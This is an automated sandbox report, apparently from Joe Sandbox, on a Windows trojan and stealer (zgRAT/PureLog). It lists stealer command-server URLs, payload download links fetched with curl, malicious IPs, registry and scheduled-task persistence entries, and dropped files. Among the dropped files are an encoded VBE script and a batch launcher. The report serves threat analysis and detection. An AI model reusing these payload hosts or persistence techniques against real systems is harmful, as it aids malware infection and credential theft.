https://steamcommunity.com/profiles/76561199724331900/inventory/	RegAsm.exe, 0000002F.00000002.1504674574.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.1499818933.000000000114E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577663593.0000000000995000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://www.youtube.com/	aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://offeviablwke.site/apiC	RegAsm.exe, 0000002F.00000002.1504229654.000000000119D000.00000004.00000020.00020000.00000000.sdmp	false
https://store.steampowered.com/privacy_agreement/	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	false
https://agentyanlark.site/api	aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://offeviablwke.site/apiB	RegAsm.exe, 0000002F.00000002.1504229654.000000000119D000.00000004.00000020.00020000.00000000.sdmp	false
https://cdn.akam	RegAsm.exe, 0000002F.00000002.1500499974.000000000117F000.00000004.00000020.00020000.00000000.sdmp	false
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://writekdmsnu.site/	aspnet_regiis.exe, 00000049.00000002.1577126857.000000000090C000.00000004.00000020.00020000.00000000.sdmp	false
https://s.ytimg.com	RegAsm.exe, 0000002F.00000002.1500499974.000000000117F000.00000004.00000020.00020000.00000000.sdmp	false
https://bellykmrebk.site/t1	aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://offeviablwke.site:443/api	aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000923000.00000004.00000020.00020000.00000000.sdmp	false
https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.biny	curl.exe, 00000015.00000002.1338068890.000001FE19ADA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000015.00000003.1313373390.000001FE19AD9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000015.00000003.1318656770.000001FE19ADA000.00000004.00000020.00020000.00000000.sdmp	false
https://www.google.com/recaptcha/	aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://checkout.steampowered.com/	aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	false
https://file.garden/ZmE_ziOgiFXI9Y48/build.binjWs64	curl.exe, 00000037.00000002.1497161944.000002E955E48000.00000004.00000020.00020000.00000000.sdmp	false
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://store.steampowered.com/;	aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://offeviablwke.site/t1	aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp	false
https://store.steampowered.com/about/	aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	false
https://steamcommunity.com/my/wishlist/	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	false
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://famikyjdiag.site/apiW	aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000948000.00000004.00000020.00020000.00000000.sdmp	false
https://help.steampowered.com/en/	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	false
https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/	aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://steamcommunity.com/market/	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	false
https://store.steampowered.com/news/	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	false
https://community.akamai.steamstatic.com/	aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://writekdmsnu.site/api	aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
http://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 0000002F.00000002.1504674574.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577663593.0000000000995000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	RegAsm.exe, 0000002F.00000002.1504674574.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577663593.0000000000995000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://recaptcha.net/recaptcha/;	aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://possiwreeste.site/api;	aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://offeviablwke.site/T1	aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp	false
https://steamcommunity.com/discussions/	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	false
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a	aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false
https://store.steampowered.com/stats/	aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	false
https://medal.tv	aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false
https://broadcast.st.dl.eccdnx.com	aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.197.40	offeviablwke.site	United States	13335	CLOUDFLARENETUS	true
188.114.97.3	file.garden	European Union	13335	CLOUDFLARENETUS	false
188.114.96.3	explorationmsn.store	European Union	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	false
104.21.1.169	underlinemdsj.site	United States	13335	CLOUDFLARENETUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1522826
Start date and time:	2024-09-30 18:19:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	203
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	UY9hUZn4CQ.exe renamed because original name is a hash value
Original Sample Name:	b1921e7e0377938146532a5abbd6dda82dff5008a94f921c40f0abf6844f9112.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1457/107@33/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 37 Number of non-executed functions: 124
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, Sgrmuserer.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: UY9hUZn4CQ.exe

Simulations

Behavior and APIs

Time	Type	Description
12:20:25	API Interceptor	1x Sleep call for process: WerFault.exe modified
18:20:41	Task Scheduler	Run new task: winlogon path: "C:\Users\user\AppData\Local\winlogon.exe"
18:20:41	Task Scheduler	Run new task: winlogonw path: "C:\Users\user\AppData\Local\winlogon.exe"
18:20:43	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Users\user\AppData\Local\winlogon.exe"
18:20:44	Task Scheduler	Run new task: msedge path: "C:\Edge\msedge.exe"
18:20:44	Task Scheduler	Run new task: msedgem path: "C:\Edge\msedge.exe"
18:20:53	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
18:21:03	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Users\user\AppData\Local\winlogon.exe"
18:21:14	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
18:21:23	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Users\user\AppData\Local\winlogon.exe"
18:21:33	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
18:21:52	Autostart	Run: WinLogon Shell "C:\Users\user\AppData\Local\winlogon.exe"
18:22:02	Autostart	Run: WinLogon Shell "C:\Edge\msedge.exe"

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with very long lines (795), with no line terminators
Category:	dropped
Size (bytes):	795
Entropy (8bit):	5.899437389020907
Encrypted:	false
SSDEEP:	24:FHUTCZ6JzO7Ch/tJ34eSM3KEOB/At+oIcceoc:FHlZkzDNtJ34iKFB/AGpe/
MD5:	BFD52A245139877A9FDB2C297CC55433
SHA1:	A117A14429E96A3F8044258896BCAE2D62733474
SHA-256:	AD3DC7F84E9F99952FF39184F70B82FABCC55B97C6CA36ADD0B02839337C94AC
SHA-512:	07DD03A86DC9508803EAF4BCF47591527C21E223BC3F93754B6F9E52C66FE2993BBD97C387D5B7E477F6CBED8386D5AFFC624A24F5B67410DF1179BDFDB324DF
Malicious:	false
Reputation:	unknown
Preview:	UoqWQ87zWAxhNc1LFDjMROX9oFioUhykJ38Lq6d7xQt2kK5PLrYTuUgFQrrKaSfzMNXUdqeIjlZAffZdJSdmJf0yX249PSgev4qWwlveMPtI5fkvRNBIz2qqXi6kvf3QF4PkyCrig8Z3wr32SJrBRYo3O99NoKtrVcDBQA6Ogdl1cw4ppESmx29qPWWzDd3WPshTo2lSMceyxxabETij1G4ddWv4nHLDjPmuOlAxdAaUXK2c55uu4TeIxE0SGroERbOiLqNdTvG1pjGSeT8sXbIQud6KusqvVWC55UQPrRaJMmcO7ixws6r0S8xruCskEUfTgKWKCtAGA9DIBrMM44DZpMn7gjfpi0F1HJrwLnu85l0S4pqCzfpKRGoUhZndOVhJ4MB19aBQKEdEVUC13czDK5kAeXPwAQukDqYsoyCZeZANmk8MWvkvfd99lAWmKOQ3T2Ap6TNEaZiv4WY4ZDZOq8EjrZGobZPPIG3ujTPCifVG5OEPlbNGyBMVxa7hNinAJSmydoVFxXpLn8ocV1C9MIaH4h6JVsz92U6mlQv7GHSbVBrzveMVgnxB2e35rMuFhpTSBC0EFE2Fz9v30GX0gddOg5uHW0P4WN3psZytoHQcusL2tAFly4iDMEvGRtsPy8smFGKaSnMZNBeyu1XVvoFco0donsb4YAnw9ixn0oTLrJ0Lj7VaWXdK2P7PngxkLSAMXsyLEufGV4uf9REpWBiBgd3tliAT1s9ZInx1IJWl1Xy8fcPVcHNKt9p4yEkfuMPm4VWWeMgMp6JJo4OJSo0

C:\Edge\L6lFlVnd0szYUYb26bZc.vbe

Download File

Process:	C:\Windows\Speech\kdmapper.exe
File Type:	data
Category:	dropped
Size (bytes):	229
Entropy (8bit):	5.838240404374592
Encrypted:	false
SSDEEP:	6:GbvwqK+NkLzWbHOurFnBaORbM5nCI7hHt16fIRVbbP:GKMCzWLOuhBaORbQCsHt1nDbP
MD5:	569A28CF34F3A51DB0CC4AA0369773EC
SHA1:	23488377EA3A37B61750952D541B867AB3D8B424
SHA-256:	86300641B7D7CF7227C163FB4CC84B0115875D923949E957B18EAED9847F0329
SHA-512:	3E7855DDA257477691618305B2979EB20D33FFBEBC8F614BE736D23482E49A04A1D0AE837789B3171575F96CB197DDA04A84BB284599E0E18769473594FF6051
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	#@~^zAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2vFX!ZT@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z39o.zzsk0t6zWVK8YnfXrhj0kb.wl)/pjVSyr!9)jc#ZT%s1c-4TR4COr~~!B~6lsk+hkAAAA==^#~@.

C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat

Download File

Process:	C:\Windows\Speech\kdmapper.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	70
Entropy (8bit):	4.968079981014333
Encrypted:	false
SSDEEP:	3:cNjpJgFNeUpnbG0DLagi0m:U1ueUJbGwLBE
MD5:	68B1414DBD5A51F2F75912513D1A035E
SHA1:	A45E03F8EDADA7FDF3697EAA6D88785CD464D373
SHA-256:	48F984A346659261B6A2CFBDF6C558A09201EB4A0DBA69F56F7A403EA7B8EB9E
SHA-512:	AA4921FCAACEE5472C7BBAA7BD1ECCB837689F988650DCE644968D6CE422C9BB1D5B4D0304F0DD5C0D643E5B3CF1B65752B704528804AC24E5BFC38D5C1205FC
Malicious:	false
Reputation:	unknown
Preview:	%ZrAnvfoASNUfO%%CBvOlEkO%..%VxFgqUHpnZxb%"C:\Edge/msedge.exe"%oRfhCeQ%

C:\Edge\msedge.exe

Download File

Process:	C:\Windows\Speech\kdmapper.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1963008
Entropy (8bit):	7.552676792704024
Encrypted:	false
SSDEEP:	24576:vCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKYXhZa2:zLLvax4Gmhscse1
MD5:	ABD343DF6FBD7334D617F76F6F050E3C
SHA1:	864A1DA1AF2E7B5049B8E7A93402D2BDED518681
SHA-256:	1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
SHA-512:	56665FD2191C2A4FB1B6F624A49203AFBB1075F510C1420F51AB7AED82259192336C056E54DA63421467AC3822DB980EEC94CED7E962107E0F04ACCED7201660
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Edge\msedge.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Edge\msedge.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w..f................................. ... ....@.. .......................`............@.................................`...K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......`...............T...u)...........................................0..........(.... ........8........E....N.......)......8I...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E............S...............8)...~....:.... ....~....{....:....& ....8.......... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....8Z...8.... ........8C...r...ps....z*....~....

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_imxyvi.exe_4847b766389ebd31bb3e56641547db635cd224a7_2d59ba1d_1c2bdfad-4e5a-40bc-80fd-2f19c1fc3ea5\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7795471650209909
Encrypted:	false
SSDEEP:	96:EMFyPttZY9Wr5n6OsFY4hqQFYS7qFf1QXIDcQRc6rcElcw3wIh+HbHg/rZHLnxZD:dmfftn6OBto0/vP6jldzuiFsZ24lO8B
MD5:	E44078C1B8398FA98985C39907BEB238
SHA1:	F71ADB758331F81DBDC5B83E51362212077FED04
SHA-256:	53EC1D2498433415D9AC05E3B95498259D910025C7EE35DC287CAC04B3D22F90
SHA-512:	ABF4DF917100844143C74A2791536D8F966B9408171A5080DBEBD3A43C41E9F6956EEEE6FBBE58BCCC16349BECFE322CF7B5F28077916E11C8FD5FEBD3B9254E
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.1.8.6.8.1.4.1.8.1.6.1.5.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.1.8.6.8.1.6.4.6.2.8.7.6.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.2.b.d.f.a.d.-.4.e.5.a.-.4.0.b.c.-.8.0.f.d.-.2.f.1.9.c.1.f.c.3.e.a.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.3.5.c.6.5.8.b.-.d.4.4.1.-.4.d.1.6.-.8.9.f.4.-.0.2.c.3.2.9.2.0.9.6.3.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.i.m.x.y.v.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.2.4.-.0.0.0.1.-.0.0.1.3.-.e.d.4.0.-.b.1.9.b.5.4.1.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.a.7.5.0.1.3.2.2.f.2.9.b.f.3.a.3.f.a.4.8.a.f.5.e.5.7.b.9.5.a.f.0.0.0.0.f.f.f.f.!.0.0.0.0.c.0.2.e.4.2.8.9.2.4.7.0.1.2.4.6.0.1.b.5.b.1.1.2.6.b.2.c.7.8.0.b.b.0.f.2.c.5.0.2.!.i.m.x.y.v.i...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.4.:.1.3.:.5.7.:.4.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER80B2.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Sep 30 16:20:14 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	84226
Entropy (8bit):	1.436799880577812
Encrypted:	false
SSDEEP:	192:UhHFrlWw1ObJMystIhBYa2Dufe39EsVm08:EFpibJHs3a2Dufe39EsVo
MD5:	1C50AD63C8A6A41FCFD36F24F9B8EA17
SHA1:	930261C9CD70F739B73864BEA786B3E7B2DE7339
SHA-256:	DBD41FC77B1FBA6BD5DA39510C7C267472C2BFA014EE15A2FEF5666F49C4A0B6
SHA-512:	3D0B2108D96390D552279913EFB3FD5BB881308A042F2F546ACFFF1D51475B7979C951396F91941E31AC9ABC4C34A48EAC28FAC899FA0750412711340B617A9F
Malicious:	false
Reputation:	unknown
Preview:	MDMP..a..... ..........f....................................$................+..........`.......8...........T...........8....9......................................................................................................eJ......L.......Lw......................T.......$......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER83B0.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8482
Entropy (8bit):	3.6960851148268703
Encrypted:	false
SSDEEP:	192:R6l7wVeJ1jRPly6Y+6q7gmfcSpDT89b1/lkf3lnm:R6lXJJRPly6YW7gmfcT1Ofo
MD5:	3C33A0EA8691BD1E0B16382BB21C405C
SHA1:	5AAAF46D32D322F092DEC8973A2B2641CF51F7AF
SHA-256:	4ECF6E056EFFBB0A90F301E14A90B68CECF498B095EFC2A702B83B424F18DC18
